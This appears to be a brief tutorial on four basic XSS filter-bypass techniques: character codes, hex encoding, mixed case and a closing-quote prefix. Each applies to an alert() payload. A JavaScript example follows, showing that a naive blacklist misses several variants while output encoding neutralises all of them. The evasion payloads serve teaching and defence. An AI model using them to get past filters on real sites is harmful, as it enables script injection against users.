Four very basic bypass methods.
1. Convert to ASCII codes
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion, it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>

2. Convert to HEX (hexadecimal)
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion, it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e

3. Change the letter case of the script
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: <ScRipt>AleRt(‘I love F4ck’)</sCRipT>
4. Add a closing sequence ”>
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: ”><script>alert(‘I love F4ck’)</script>
For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

The conversions were done with HackBar, a Mozilla add-on for Firefox.
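
From the defender's side, the four variants above show why matching on input strings fails and why encoding at the point of output does not depend on which variant arrives. The following is an added example, not part of the original post: `naiveBlacklist`, `escapeHtml`, `renderAttr` and `survey` are hypothetical names, and the samples are the post's own strings typed with straight quotes.

```javascript
// Added example. Samples are the post's variants, typed with straight quotes.
const samples = {
  original:  "<script>alert('I love F4ck')</script>",
  charCode:  "<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>",
  hex:       "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e",
  mixedCase: "<ScRipt>AleRt('I love F4ck')</sCRipT>",
  closing:   "\"><script>alert('I love F4ck')</script>",
};

// Hypothetical blacklist: case-sensitive match on the raw input.
function naiveBlacklist(raw) {
  return raw.includes("<script>alert(");
}

// Encode every character that can end a text node or a quoted attribute.
function escapeHtml(s) {
  return s.replace(/[&<>"'`]/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Decode once, as a web framework does before handing the value to the app,
// then encode at the point of output into a double-quoted attribute.
function renderAttr(raw) {
  let value;
  try {
    value = decodeURIComponent(raw);
  } catch (e) {
    value = raw; // malformed percent-escape: treat the input as literal text
  }
  return '<input value="' + escapeHtml(value) + '">';
}

// For each sample: did the blacklist catch it, and is the rendered markup inert?
function survey() {
  const out = {};
  for (const [name, raw] of Object.entries(samples)) {
    const html = renderAttr(raw);
    out[name] = {
      blocked: naiveBlacklist(raw),
      inert: /^<input value="[^<>"']*">$/.test(html),
    };
  }
  return out;
}

console.log(survey());
```

The blacklist catches only two of the five inputs, while the encoded output is inert for all five, including the value that starts with a closing quote.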